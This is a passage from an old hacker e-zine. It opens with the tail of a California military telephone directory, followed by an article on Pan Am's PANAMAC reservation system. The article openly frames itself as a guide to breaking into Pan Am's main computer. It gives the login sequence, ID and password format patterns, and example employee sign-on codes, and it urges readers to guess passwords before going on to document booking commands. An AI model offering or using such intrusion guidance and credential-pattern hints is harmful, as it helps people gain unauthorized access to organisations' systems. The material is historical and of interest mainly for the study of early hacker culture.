  1601. FAA Oakland Air Rt Trf Con Cen, Fremont......................... 730-1595
  1602. Flt Air Con & Surv Fac (FACSFAC) TCC/OC Only, San Diego......... 727-3925
  1603. Flt Anal Cen, Corona............................................ 933-XXXX
  1604.                                                      Oper Assit. 933-0111
  1605. Flt Anti-Sub Warefare Sch, San Diego............................ 524-XXXX
  1606.                                                      Oper Assit. 524-0111
  1607. Fort Irwin, Barstow............................................. 470-XXXX
  1608.                                                      Oper Assit. 470-0111
  1609. Fort Mason, San Francisco....................................... 586-XXXX
  1610.                                                      Oper Assit. 586-1110
  1611. Fort Ord, Monterey.............................................. 929-XXXX
  1612.                                                      Oper Assit. 929-1110
  1613. George AFB, Victorville......................................... 353-XXXX
  1614.                                                      Oper Assit. 353-1110
  1615. German Mil Rep to USA/Cent Area, Long Beach NS.................. 360-0111
  1616. Letterman Genral Hospital, San Francisco........................ 586-XXXX
  1617.                                                      Oper Assit. 586-2231
  1618. Los Angeles AFS................................................. 833-XXXX
  1619. [more]                                                            Oper Assit. 833-1110
  1620.                                                       Info Oper. 989-1780
  1621.                                                        MLP Oper. 838-XXXX
  1622. March AFB, Riverside............................................ 947-XXXX
  1623.                                                      Oper Assit. 947-1110
  1624. Marine Corps AirSta, El Toro.................................... 524-XXXX
  1625.                                                      Oper Assit. 997-3011
  1626.                    Rctg Depot, San Diego........................ 524-XXXX
  1627.                                                       Info Oper. 524-1011
  1628.                    Log Sup Base, Barstow........................ 282-XXXX
  1629.                                                      Oper Assit. 282-0111
  1630. Marine Corps Air Ground Combat 29 Palms.................... 952-5XXX/6XXX
  1631.                                                      Oper Assit. 952-6000
  1632. Mather AFB, Sacramento.......................................... 828-XXXX
  1633.                                                      Oper Assit. 828-1110
  1634. McClellan AFB, Sacramento....................................... 633-XXXX
  1635.                                                      Oper Assit. 633-1110
  1636.                AUTODIN Tech Con, Sacramento..................... 730-1493
  1637. MCS Office Long Beach........................................... 360-6645
  1638. Mil Tfc Mgt Cmd (MTMC) WA HQ Oakland Army Base.................. 859-XXXX
  1639.                                                      Oper Assit. 859-0111
  1640. [more]                      WA MOT Bat Area.................................. 859-XXXX
  1641.                WA S/CA Outport SAn Pedro OPER Asst.............. 853-1650
  1642.                MTMC WA MATCO Norton AFB CA...................... 876-XXXX
  1643.                MTMC WA MATCO Norton AFB OPER Asst............... 876-1110
  1644.                MTMC WA MATCO Travis AFB CA...................... 837-XXXX
  1645.                MTMC WA MATCO Travis AFB OPER Asst............... 837-1110
  1646. Natl Gd State Maint Ofr, Sacramento............................. 466-6571
  1647.                                                      Oper Assit. 466-6605
  1648. Natl Parachute Test Range, El Centro............................ 958-8XXX
  1649.                                                      Oper Assit. 958-8212
  1650.                                                  Non-Duty Hours. 958-8547
  1651. Nav Air Sta, Alameda............................................ 686-0111
  1652.                Imperial Beach................................... 951-0111
  1653.                Lemoore.......................................... 949-0111
  1654.                Miramir.......................................... 577-XXXX
  1655.                                                      Oper Assit. 577-1011
  1656.                Moffett Fld, Sunnyvale........................... 462-0111
  1657.                COM NAS North Island............................. 951-0111
  1658. Nav Amph Base - Coronado, San Diego............................. 577-XXXX
  1659.                                                      Oper Assit. 577-2011
  1660. Nav Comm Sta, NavOp Radio and Tele(NORATS), San Diego........... 958-3XXX
  1661. [more]                                                            Oper Assit. 958-3011
  1662.               San Francisco, Stockton........................... 466-7444      
  1663.                "     "       Tech Con, Stockton................. 730-1581
  1664. Nav Const Bn Cen, Port Hueneme.................................. 360-XXXX
  1665.                                                      Oper Assit. 360-4001
  1666.               Cdmr Nav Base, San Diego.......................... 958-3011
  1667. Nav Hosp, Long Beach............................................ 873-9XXX
  1668.                                                      Oper Assit. 873-9011
  1669.               Oakland........................................... 855-XXXX
  1670.                                                      Oper Assit. 855-5000
  1671.               San Diego......................................... 522-6011
  1672. OIC of Navy Const, Mare Island.................................. 253-XXXX
  1673.                                                      Oper Assit. 253-2101     
  1674.               Mare Isl Vallejo.................................. 253-XXXX
  1675.                                                      Oper Assit. 253-0111
  1676. Nav Ocean Sys Ctr............................................... 553-XXXX
  1677.                                                      Oper Assit. 533-0111
  1678. Nav Shp Wpn Sys Engr Sta, Port Hueneme.......................... 360-XXXX
  1679.                                                      Oper Assit. 360-4711
  1680. Nav Sta, Long Beach............................................. 360-XXXX
  1681.                                                      Oper Assit. 360-0111
  1682. [more]       Nav Sta, San Diego.............................................. 958-XXXX
  1683.                                                      Oper Assit. 958-0111
  1684. Nav Sta, Treasure Island, San Francisco......................... 869-XXXX
  1685.                                                         Duty Off 869-6233
  1686.                                                      Oper Assit. 869-6411
  1687.                                                    Non Duty Hrs. 869-6233
  1688. Nav Sup Cen, Oakland............................................ 836-XXXX
  1689.                                                       Oper Assit.836-0111
  1690.                                                        Info Oper 836-4011
  1691.                San Diego........................................ 522-XXXX
  1692.                                                      Oper Assit. 522-1011
  1693. Nav Tng Cen, San Diego.......................................... 524-XXXX
  1694.                                                       Oper Asst. 524-0111
  1695. Nav Tng Cmd Pac Fleet, San Diego................................ 524-XXXX
  1696.                                                      Oper Assit. 524-0111
  1697. NAVSURFPAC, San Diego........................................... 958-9XXX
  1698.                                                      Oper Assit. 958-9101
  1699. South Pac, Moffet Fld........................................... 462-XXXX
  1700.                                                      Oper Assit. 462-0111
  1701. Nav Wpns Cen China Lake......................................... 437-XXXX
  1702.                                                      Oper Assit. 437-9011
  1703. [more]       Nav Wpns Sta, Concord........................................... 253-5111
  1704. Nav Wpns Sta Steal Beach........................................ 873-7XXX
  1705.                                                      Oper Assit. 873-7000
  1706. Navy Post Grauduate School, Monterey............................ 878-XXXX
  1707.                                                      Oper Assit. 878-0111
  1708. Norton AFB, San Bernardino...................................... 876-XXXX
  1709.                                                      Oper Assit. 876-1110
  1710.                AUTODIN Tech Con................................. 898-3944
  1711. Oakland Army Base............................................... 859-XXXX
  1712.                                                      Oper Assit. 859-0111
  1713. Pacific Msl Test Cen, Point Mugu................................ 351-XXXX
  1714.                                                      Oper Assit. 351-1110
  1715. Pasadena Fed Cen................................................ 879-5011
  1716. Point Sur Nav Fac, Big Sur...................................... 629-1470
  1717. Presidio of San Francisco....................................... 586-XXXX
  1718.                                                      Oper Assit. 586-1110
  1719. Rio Vista....................................................... 586-5837
  1720. Riverbank Army Ammo Plt......................................... 466-4100
  1721. Sacramento Air Log Cen.......................................... 633-XXXX
  1722.                                                      Oper Assit. 633-1110
  1723. Sacramento Army Depot........................................... 839-XXXX
  1724. [more]                                                            Oper Assit. 839-1110
  1725. Sharpe Army Depot, Lathrop...................................... 462-2XXX
  1726.                                                      Oper Assit. 462-2011
  1727. Sierra Army Depot, Herlong...................................... 830-9XXX
  1728.                                                      Oper Assit. 830-9910
  1729. Space & Msl Sys Org, Los Angeles................................ 833-XXXX
  1730.                                                      Oper Assit. 898-1780
  1731. Travis AFB, Fairfield........................................... 837-XXXX
  1732.                                                      Oper Assit. 837-1110
  1733.                 22nd AF Tac Cmd Post............................ 730-1410
  1734.                 22nd AF Tac PBX................................. 869-3480
  1735. USPFO Natl Gd, San Luis Obispo.................................. 879-9201
  1736.                                                      Oper Assit. 878-9211
  1737. Vanderberg AFB, Lompox.......................................... 27X-XXXX
  1738.                                                      Oper Assit. 276-1110
  1739. West Div Nav Fac Engr Cmd, San Bruno............................ 859-XXXX
  1740.                                                      Oper Assit. 859-7111
  1741. 6th Army Presidio of San Francisco.............................. 586-1110
  1742. 15th Air Force wea Spt Unit, March AFB.......................... 727-1647
  1743.  
  1744.                              END OF PART 1 
  1745. [more]                                    ~~~~~~~~~~~~~~
  1746. The file is getting rather long and dont want to bore people with long lists
  1747. of numbers therefore, Part ][ & Part ]I[ will be on later issues of P/HUN 
  1748. Online Magazine.
  1749.  
  1750. DareDevil at P/HUN Magazine Inc.
  1751.  
  1752.  
  1753. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1754. =                 P/HUN Issue #3, Volume 2: Phile #5 of 11                    =
  1755. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1756.  
  1757.  
  1758.             /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\  
  1759.             \                                                /
  1760.             /  The Pan Am Airline Computer (c) 1994 "PART A" \
  1761.             \  --------------------------------------------- /
  1762.             /                                                \
  1763.             \                By  Red Knight                  /
  1764.             /                                                \
  1765.             \   A P/HUN Magazine Incorporation Productions.  /
  1766. [more]                   /                                                \
  1767.             \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/  
  1768.  
  1769.  
  1770. Introduction:
  1771. -------------
  1772. Ever wondered how the airline computers work? Well this article will inform
  1773. you as to various information,commands etc. The more you know about them the
  1774. more favors you can ask of them. I will go into details on how they go about 
  1775. booking actual flights so you get an understanding on how its done. The article
  1776. will have actual outputs etc and explained in depth.
  1777.  
  1778. The best way to explain to first understand the PANAMAC computer. Then you 
  1779. can go on and hack the main Pan Am computer because all the commands are the
  1780. same.
  1781.  
  1782. What is PANAMAC?:
  1783. ----------------
  1784. PANAMAC are computers Pan Am's Sales Agent use for booking flights, answering 
  1785. our various questions on arrivals,departures,visa etc.This is only a small 
  1786. percentage of the questions.PANAMAC is full of info.    
  1787. [more]       
  1788. Where can you find answers to the these questions:
  1789.  
  1790. - What is a DH7 aircraft
  1791. - How many passengers were their in flight P2308 last month
  1792. - What will be the bus fair when traveling from Mombasa to Nairobi in Kenya
  1793. - What does SXR represent
  1794. - Information on carrying pets 
  1795. - Where does one go for yellow fever shot in Kansas or anywhere in USA
  1796. - What is the departure tax from from anywhere in the world   
  1797. - How many ciggerates is one allowed to take from USA to Pakistan
  1798. - Where to stay 
  1799. - Which hotels?
  1800. - Weather conditions in a particular country
  1801. - Flight delays 
  1802.   
  1803. Get my drift? Well the above questions can be answered using the PANAMAC.
  1804. PANAMAC is manufactured by ICOT.
  1805.  
  1806.  
  1807. Logging On to The Main Pan-Am Computer: (Not the PANAMAC )
  1808. [more]       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1809. [This particular info on logging on was acquired from a Pan-Am employee]
  1810. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  1811. This is the most hardest part of all. While logging on to the Pan Am computer
  1812. you will not see any type of an identifier. These system use E,7,1 
  1813. characterists.             
  1814.  
  1815. Enter as follows:
  1816.  
  1817. ".Nodes" or ".N" then the Node Identifier:
  1818.  
  1819. The Node identifier:
  1820. ~~~~~~~~~~~~~~~~~~~~  
  1821. This part of info will contain the NPA a person is calling from and then  
  1822. followed by a 7 digit access number in which last two are the state abb.    
  1823.                                              
  1824. An example would be: 71811355NY <C/R>
  1825. Its a high possiblity that the "11355" could be a zip code
  1826.  
  1827. The Person ID:
  1828. ~~~~~~~~~~~~~~
  1829. [more]       After the Node Identifier enter:
  1830.  
  1831. .PI [ (NPA,8 Alpha Numeric Chracters which first being a letter)
  1832.  
  1833. Password   
  1834. ~~~~~~~~
  1835. The password is assigned to the employees which is supposed to be 6 to 8      
  1836. characters alphanumeric with first being usually "P"
  1837.  
  1838. Enter Password using ".P" or ".PASSWORD" (No echo)
  1839.  
  1840. (After this you will get a long pause for about 1 min) Then if you guessed 
  1841. wrong then it will log you off. 
  1842.  
  1843. Your in!!!
  1844. ~~~~~~~~~~
  1845. If you have made it so far then you are a hell of Hacker and you have my full
  1846. respect.
  1847. After you have entered correct information then you will get a message like
  1848. this:
  1849.  
  1850. [more]       Pan Am Airlines (4854.00PA)
  1851. Unauthorized Access will lead to a prosecution.
  1852.  
  1853. > ( This is the SOM Prompt)
  1854.  
  1855. (After that you will get a "SOM" prompt. Then from here on your home free.
  1856. The SOM is there for you. Almost all the commands in the PANAMAC will work
  1857. on their Main Computer.                  
  1858.  
  1859. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1860. ** NOTICE ,READ CAREFULLY **
  1861.  
  1862. From here on the article will deal with PANAMAC Airline Computer which your
  1863. sales agent uses to book you a flight and give you information.
  1864. You wont be able to call these up tho, but rather use the infomation provided
  1865. here when you hack the Main Pan-Am Airline Computer. (Process is described 
  1866. above) 
  1867.  
  1868. I repeat, all the commands are on The PANAMAC will work on the Main Computer.
  1869.  
  1870. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1871. [more]       Basic PANAMAC hardware:
  1872. -----------------------
  1873. A set consists of a display screen, standard type writer key board with row of
  1874. function keys along the top. There will also be a block of keys to the right
  1875. of the main key board and another block of keys to the far right.
  1876. I will explain almost all the keys on the board.The keyboard is a little   
  1877. different from the regular IBM keyboards.  
  1878.  
  1879.                    Basic Layout of a PANAMAC keyboard
  1880.                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1881. ____________________________________________________________________________ 
  1882. |                                                                           |
  1883. |  +----------------------------------------------------------------------+ | 
  1884. |  |                F   U  C  T  I  O  N    K  E  Y S                     | |
  1885. |  +----------------------------------------------------------------------+ |
  1886. |                                                                           |
  1887. |  +---------------------------------------+  +---------+ +---------------+ |
  1888. |  |                                       |  | cursor  | |               | |
  1889. |  |                                       |  |  keys   | |               | |
  1890. |  |                                       |  | Next    | |  PF 1-30      | |
  1891. |  |  Basic Keyboard with twin functions   |  | Part    | |  15 keys      | |
  1892. [more]       |  |  invoked by ALT + [Key]               |  | Delete  | |               | |
  1893. |  |                                       |  |  etc.   | |               | |
  1894. |  |                                       |  |         | |               | |
  1895. |  +---------------------------------------+  +---------+ +---------------+ |
  1896. |___________________________________________________________________________|
  1897.  
  1898. Here is a list that are used the most.The rest that I did not go into details
  1899. are almost never used.
  1900. (They can be invoked by using the ALT plus the approriate key)
  1901.  
  1902.  For eg. The (CALC) - Use to get into calculator mode.
  1903.  
  1904.            +------+
  1905.            |  Z   |
  1906.  ALT  +    +------+ ----> CALCULATOR MODE
  1907.            | CALC | 
  1908.            +------+
  1909.  
  1910. (CHNG SCRN) - Changes from one screen to the second screen.  
  1911.  
  1912. (CHANGE) - Used when changing name entries.
  1913. [more]       
  1914. (RESET) - to reset the system.Eg. IF you are in the CALC mode to use this
  1915.         return to regular mode.
  1916.  
  1917. (IGN) - Used to ignore any transaction made like when you enter something 
  1918.        for example in the PNR (Passenger Name & Record) and you dont wish to
  1919.        save the current format you would use the IGN.
  1920.  
  1921. (XITN) -Cancel all itinerary in a PNR. The intinerary is the record of a flight
  1922.  
  1923. (ARNK) - Arrival not known.
  1924.  
  1925. (ET) - End Transaction. This store the the edited PNR.
  1926.  
  1927. (GFAX) - General FACTS. Info on passengers that Pan Am & other airlines need to
  1928.          know.
  1929.  
  1930. (FAX) - Host FACTS. Info on passengers that only Pan Am needs to know.
  1931.  
  1932. (RMKS) - Remarks field to store misc info.
  1933.  
  1934. [more]       (RCVD) - Received filed. Name of person who made the booking.
  1935.  
  1936. (SEG) - Leave an open segment for a passenger who may want to return at an 
  1937.         unknown date but is sure that he/she will travel by Pan Am.
  1938.   
  1939. (IAS) - The "/" key is on the bottom of the keyboard. The letters "IAS" stand
  1940.         for Insert After Segement (will be used later in the article).
  1941.  
  1942. (NAME) - Name of persons traveling eg. -3smith/sethmr/danmr/loydmr  this is 
  1943.         an eg. of an entry made if three person seth, dan, loyd were travelling
  1944.         a family obviosly having the same last name.
  1945.  
  1946. (DSPL) - Display a PNR, history, itin etc.
  1947.  
  1948. (CLEAR) - To clear the field that you are working in (To clear all fields press
  1949.           ALT - CLEAR)..Doesn' delete any info.
  1950.  
  1951. (ALARM) - When you hear a "beep" use ALT-R (alarm) to clear the alarm.
  1952.  
  1953. (SOM) - Start of message.You will receive a new start of message. 
  1954.  
  1955. [more]       (CLICK) - A toggel to switching on & off of the blinking of the cursor.
  1956.  
  1957. (RDUC) - Reduce fares.This is to view fares on senior citizen, students etc.
  1958.  
  1959. (ERASE) - A sort of a DEL key to delete the last character.
  1960.  
  1961. (SHIFT) - Used to toggle the second mode of the key.
  1962.  
  1963. (CALC) - To get to the calculator mode.   
  1964.  
  1965. (END-I) - Used to display domestic fairs. 
  1966.  
  1967. (END ITEM) - Used while inputing many name entries;Instead of using the <C/R>.
  1968.              
  1969. (ENTER) - Self explanatory.
  1970.  
  1971. (EDIT FRMAT) - To transpose a copy from one field so another.
  1972.  
  1973. (NEXT PART) - Move the cursor from one field to another.
  1974.  
  1975. (INSERT CHAR) - Insert a character.
  1976. [more]       
  1977. (DELETE CHAR) - Erase a character between a word and moves up the rest of the
  1978.                 word.
  1979.  
  1980. (INSERT LINE) - To Insert a line.
  1981.  
  1982. (DELETE LINE) - Self Exp. but cursor remains there.
  1983.  
  1984. (PART) - Just like the cursor keys UP,DOWN,RIGHT,LEFT.
  1985.  
  1986. (PF10) - To direct a command to the upper left field.
  1987.  
  1988. (PF11) - "    "    "    "     "  "    "   right ".
  1989.  
  1990. (PF13) - "    "    "    "     "  "  bottom left ".
  1991.  
  1992. (PF14) - "    "    "    "     "  "    "   right ".
  1993.  
  1994.                           Part II
  1995.                           ~~~~~~~
  1996. SOM/CURSOR: 
  1997. [more]       ---------- 
  1998. When they first start, the screen is divided into 4 parts (dotted
  1999. line line sepating the four fields.Each of those four field
  2000. contains the SOM (this is PANAMAC prompt).The SOM looks like 
  2001. an equilateral triangle pointing towards the right.The cursor 
  2002. could be in any field or left of when last used. 
  2003. In this article the I have characterized the SOM as ">"
  2004. Now to move to the next field one would use the "NEXT PART" key. 
  2005.  
  2006. SINNING IN (LOGGING IN):
  2007. ------------------------
  2008. In order to use the PANAMAC the all sales agents have to sine in.
  2009. Each user is assinged 2 things:                                    
  2010.  
  2011. 1) COLLINS SINE: - This is needed to sine in to the phone.
  2012. 2) PANAMAC SINE: - This is needed to access the computer.
  2013.  
  2014.  
  2015. COLLINS SINE:
  2016. -------------
  2017. The COLLINS SINE is a code used to access the phone system to receive calls
  2018. [more]       and make calls.This serves as an unlocking device
  2019. The collins sine consists of 9 chracters.The first is always an asterisk the  
  2020. next two are CAPITALS letters almost always (SI)        
  2021. Here are some examples of COLLINS SINEs :
  2022.  
  2023. *SI340450
  2024. *SI409321
  2025. *SI345090
  2026. *SI430092
  2027.  
  2028. By sinning into the telphone is exactly what I mean. One would enter in thru
  2029. the touch tones (NOT THRU THE COMP)
  2030. So therefore *SI30450 one would would enter the * ,74 for SI then the rest 
  2031. of the #s.
  2032.  
  2033. Heres how the telephone key PAD looks :   
  2034.  
  2035. _________________________________________________________________
  2036. |  ____________________________   _______    _______   _______  |
  2037. |  |        |        |        |   | REL |    |EMGY |   | CW   | |
  2038. |  |        |  ABC   |   DEF  |   |_____|    |_____|   |______| |
  2039. [more]       |  |    1   |   2    |    3   |   |DAIL |                       |
  2040. |  |________|________|________|   |_____|                       |
  2041. |  |        |        |        |   |SUPV |                       |
  2042. |  |   GHI  |   JKL  |   MNO  |   |_____|                       |
  2043. |  |    4   |    5   |    6   |                                 |
  2044. |  |________|________|________|                                 |
  2045. |  |        |        |        |                                 |
  2046. |  |   PQR  |   TUV  |   WXY  |                                 |
  2047. |  |    7   |    8   |    9   |                                 |
  2048. |  |________|________|________|    _____                        |
  2049. |  |   *    |   0    |    #   |   | IN  |                       |
  2050. |  |________|________|________|   |_____|  _____                |
  2051. |                                 | AVI | | RPT |               |
  2052. |                                 |_____| |_____|               |
  2053. |_______________________________________________________________| 
  2054.  
  2055. Key Pad:                                                    
  2056. --------
  2057. IN - The IN key on the telephone key pad serves as a hold button the key will
  2058.      blink when customer is on hold.
  2059. AVI - (Available) is depressed when the sales agent is available for the
  2060. [more]             next call.
  2061. RPT - [Unknown]
  2062.  
  2063. REL - (Release) Pushed when the sales agent doesn't want to be instantly
  2064.       available for the next call. Depress AVI before releasing call.
  2065. DAIL - (out dail) - Depress the key and dial out. Method :
  2066.        1) When asking for help 7714,7721,7713
  2067.        2) Pantel (Used to call up the Pan Am airport) - 8XXX-XXXX
  2068.        3) Local 212 Calls 9XXX-XXXX. 
  2069.        4) All others 8XXX-XXX-XXXX
  2070. SUPV - When the sales people ask for assistance 
  2071. EMGY - This key is an important one. Suppose some one makes a bomb threat
  2072.        this key is immediatly depressed and the conversation is recorded in
  2073.        another room. The sales agents have been taught to keep them online
  2074.        as much as they can.
  2075. CW -  Will be used for Call Waiting in the future.  
  2076.  
  2077. PANAMAC SINE:
  2078. ------------- 
  2079. The PANAMAC SINE in consists of 10 characters with BSIA (always) the first
  2080. four. The next four are all numbers and the last 2 are letters which could be
  2081. [more]       anything.  
  2082.  
  2083. Examples:   
  2084.  
  2085. BSIA0290KI
  2086. BSIA8534PO
  2087. BSIA3309DS 
  2088.  
  2089. Procedure:
  2090. ----------  
  2091. This is the procedure they follow:
  2092. 1) Sine in to the telephone - *SI       
  2093. 2) Sine out - *SO ( the SO stands for sining out)
  2094. 3) Sine in the computer - [PAMAMAC SINE]
  2095. 4) Sine into the telephone   
  2096.  
  2097. Now the sales agent is ready to receive calls.
  2098.  
  2099. General Information Index:
  2100. --------------------------
  2101. PANAMAC contains most of the technical information that is needed by the
  2102. [more]       the service representatives.
  2103.  
  2104. To display (G)eneral (I)nformation (I)ndex you would input:
  2105.  
  2106. >KIINF  followed by the first letter of the subject desired.     
  2107.  
  2108. OUTPUT:
  2109.  
  2110. KIABLA - Albany Airport Info
  2111. KIATLA - Airport at Atlanta Georgia
  2112. KIAULA
  2113. KIABWA
  2114. KIBOSA
  2115. :
  2116. etc ...  
  2117. :
  2118. KIZAQE
  2119.  
  2120. By just entering KIINF you would get all the KIINF Index from A to Z.
  2121. You can take it as if the KIINF is a root directory and its divided into
  2122. thousands of subdirectories.
  2123. [more]       
  2124. The letter KI actually stands for `Key In` followed by the INF for 
  2125. information.
  2126.  
  2127. For example if you wanted to display general information on car rentals
  2128. it would like this:
  2129.  
  2130. >KIINFC  (Type at the SOM)
  2131.  
  2132. The system will list car-rental related files.Then all they do is retrieve
  2133. it.
  2134.  
  2135. Station Information File (CITY INDEX)
  2136. ------------------------------------ 
  2137. PANAMAC also contains information about specific cities.To display the
  2138. Index for a particular city, one is able to Key In (KI) and type in the 
  2139. three letter city code. So lets say you wanted some information about
  2140. Atlanta : Type in:
  2141.  
  2142. >KIATL
  2143.  
  2144. [more]       This will display all of the files concerning Atlanta. Now to display a 
  2145. particular file to view one would enter KIATL plus the the letter code of the 
  2146. file name. Therefore if you wished to view the information on airports in 
  2147. Atlanta enter:
  2148.  
  2149. >KIATLA
  2150.  
  2151. you will have a screen filled with all sorts of information about the Airports
  2152. in Atlanta. 
  2153.  
  2154. Examples of some Catagories of G.I.N
  2155. ------------------------------------ 
  2156.  
  2157. Index        Help On
  2158. -----        -------
  2159. KISKDE  - What type of Aircraft is an AB3 ?
  2160. KIXXKU  - What is the City Code for Kuala Lampur ?
  2161. KICCCG  - What is the currency code for Greek money and whats it called ?
  2162. KITTA   - What movies will be shown on the flights next month ?
  2163. KIIHCH  - Is there an Inter-Continental Hotel in Columbo ?
  2164. KIBOMC  - How many cigarettes are allowed for a passenger going to Bombay ?
  2165. [more]       KINYCV  - Where can one go to get a Yellow Fever shot on N.Y ?    
  2166. KIJFKT  - How much will a taxi cost from JFK Airport into the city ?
  2167. KILONK  - What time did a flight PA 56 arrive in London this morning ?
  2168.  
  2169. Its impossible to list all the Key Ins in this article. In future I may       
  2170. write up an article listing all of these.                 
  2171.  
  2172.  
  2173.                           Part III
  2174.                           ~~~~~~~~
  2175.  
  2176. Booking Pan Am Flights: 
  2177. -----------------------
  2178. To ask Panamac which flights are available on a specific day, you type a
  2179. standard availability entry :
  2180.  
  2181. >A 6JUNNYCMIA0900
  2182.  
  2183. Lets break it down:
  2184.  
  2185. - The 'A' is always used.Its is the action code to request availability
  2186. [more]       - The '6' is the departure date
  2187. - The 'JUN' is obviously the first three letters of the month
  2188. - 'NYC' is the origin city where the flight is taking off
  2189. - 'MIA' is destination city which in this case would be Miami
  2190. - and the '0900' is the time desired    
  2191.  
  2192. So therefore on a flight on 3rd of July from Nairobi to London at 1100 hours
  2193. would be:      
  2194.  
  2195. >A3JULNBOLON1100 [spacing is optional]
  2196.  
  2197. When requesting availabity FROM/TO codes should be CITY codes.This   
  2198. will allow Panamac to display the full schedule of flights operating 
  2199. FROM/TO all airports in that city,beginning with the time requested.
  2200. For eg. If you request availability FROM/TO JFK,Panamac will only    
  2201. display flights that operate FROM/TO JFK but If you request availabilty
  2202. FROM/TO NYC, Panamac will display flights operate FROM/TO JFK and LGA
  2203.  
  2204. Availabity Display:
  2205. -------------------
  2206.  
  2207. [more]       Panamac will display up to 6 lines of both direct and connecting services
  2208. beginning with the Pan Am flights closest to the time requested.
  2209.  
  2210. For eg: Lets assume that one the sales agent has made the following entry     
  2211.         from Newyork city to Frankfurt:
  2212.  
  2213. >A 18AUGNYCFRA1800
  2214.  
  2215. The Panamac will display the following output:
  2216.  
  2217. 18 AUG-THU-PA HELI FREE PJ                  ALTERNATE SERVICE
  2218. 1PA   72  PAJAYABOHA   JFKFRA   1830  0745*1  74X  DDD0  715
  2219. 2PA   4   PAJAYABAHA   JFKFRA   1800  1215*1  74*  DDD1  1015
  2220.  :    :      :           :        :     :      :    :     :
  2221.  [and so on...]
  2222.  
  2223. Rememeber these are "Direct Flights" not connecting
  2224.  
  2225. Analyzing the first 2 lines:
  2226. ---------------------------
  2227. line 1:
  2228. [more]       -------
  2229. 18AUG-THU - The date you requested with the day of the week
  2230. PA HELO FREE - City Pair Message..Consists of general info
  2231. ALTERNATE SERVICES - Service other than than direct PA is programmed
  2232.  
  2233. Line 2:
  2234. -------
  2235. 1 - Line number. PMC will display up to six lines of both direct and 
  2236.     connecting service beginning with those flights closer to the time 
  2237.     required
  2238. PA - PA is the airline code for Pan Am
  2239. 72 - Flight number
  2240. PAJAYABOHA - Indication of classes for eg:
  2241.              P - Premium First Class               
  2242.              J - Premuim Clipper Class (wide body aircraft)
  2243.              Y - Mormal Eco Class
  2244.              B - Apex fare                   
  2245.              H - Bulk Fare
  2246.              A - This indicate that the flight is available
  2247.              0 - No seats available (ZER0)
  2248. JFKFRA - This will tell you the departure and the arrival.Only AIRPORT
  2249. [more]                CODES are used.
  2250. 1830 - Departure time
  2251. 0745 - Arrival time
  2252. *1 - This will show when the flight will arrive one day later 
  2253. 74X - [Self explanatory]
  2254. DDD - Indicates that meals are served if Blank then no meals served
  2255. 0 - The NUMBER of time the flight will make a stop between the two airports
  2256.     
  2257. 715 - Elapased flying timw in hours and minutes.  
  2258.  
  2259. Sometimes after the entry of classes one may see "X plus to digits of the
  2260. week...For eg. "X13
  2261. This means that flights operates only on certain days of the week except
  2262. Mondays & Wednesdays. If blank then flights are everyday.
  2263.  
  2264.  
  2265. If no specific departure time is indicated by the passenger an availability
  2266. entry can be made indicating "A" for A.M , "P" for P.M and "N" for noon.
  2267.  
  2268. eg.
  2269.  
  2270. [more]       >P23FEBNYCAUS  --> In this case the Panamac assumes that its 1700
  2271.  
  2272. Short selling    
  2273. -------------
  2274.    
  2275. Lets say one of the availability display was as follows:
  2276.  
  2277. 10DEC
  2278. 4PA  754  JAYA   JFKLHR 600  1200  74X  S  0  6:00
  2279.  
  2280.  
  2281. The departure is from JFK to london's Hethro Airport
  2282. Now suppose  you wanted to book 3 seats on this flight.They would enter as
  2283. follows:
  2284.  
  2285. > N3Y4   
  2286.  
  2287. N - This the abb. for "need" for the Panamac
  2288. 3 - Number os seats.In our case 3 
  2289. Y - This is the class (Y in this case)
  2290. 4 - This tells us the line number of the Display explained above
  2291. [more]       
  2292. This method of booking seats is called short selling.[Short Sell]
  2293. incase you ever ever hear it.
  2294.  
  2295. The Panamac will respond with:
  2296.  
  2297. 1PA 754 Y 10DEC  JFKLHR  HS3  600 1200
  2298.  
  2299. 1 - This represents the numbers of flights the sales agent has booked
  2300. PA - The 2 letter code for Pan Am
  2301. 754 - Is obviosly the flight #     
  2302. Y - The class
  2303. 10DEC - The date of departure from NYC
  2304. JFKLHR - Flight going from Newyork City to London
  2305. HS3 - (H)ave (S)old three seats confirmed
  2306. 600 1200 - the the departure and arrival time
  2307.  
  2308. Connecting Flights:
  2309. -------------------
  2310. Many times a passenger travels from point of origin to final destination
  2311. by connecting from one flight to another at an intermediate point or points 
  2312. [more]       This will be a single connection wehn only one point (City) is involved
  2313. and there is also a concept of "double connection" ... This obviously means
  2314. that the person changes flights at 2 cities.
  2315.  
  2316. While viewing the display a typical connecting flight would look like this
  2317.  
  2318. 5PA 120 PAJAYABAHA 1DEC  [   ]LON  600  1200   75X  LLL0  600 400
  2319.  
  2320. It is a clearly visible that this is a connecting flight because we have the
  2321. elapsed time (600) and the total elapsed time of connecting service from   
  2322. origin city to its destination (400)...Simple enough huh ?
  2323.  
  2324. Short selling is also done in this case.
  2325. Format used:
  2326.  
  2327. [ N ][# SEATS][CLASS][FROM A DISPLAY LINE][ITS CLASS][FROM LINE]
  2328.  
  2329. How to display a particular flight:
  2330. -----------------------------------
  2331. Assume that you have the following flight on an availability display
  2332.  
  2333. [more]       01JAN-FRI-
  2334. 1PM  90  PAJAYABOHA      LAXZRH  1030  0930*1  74X     2 1515
  2335.  
  2336. Suppose you make a reservation on flight 90, the 01JAN and want to ask
  2337. the sales agent where the flights stops en-route and what day the flight 
  2338. arrives. This is what he/she will enter into PANAMAC...       
  2339.  
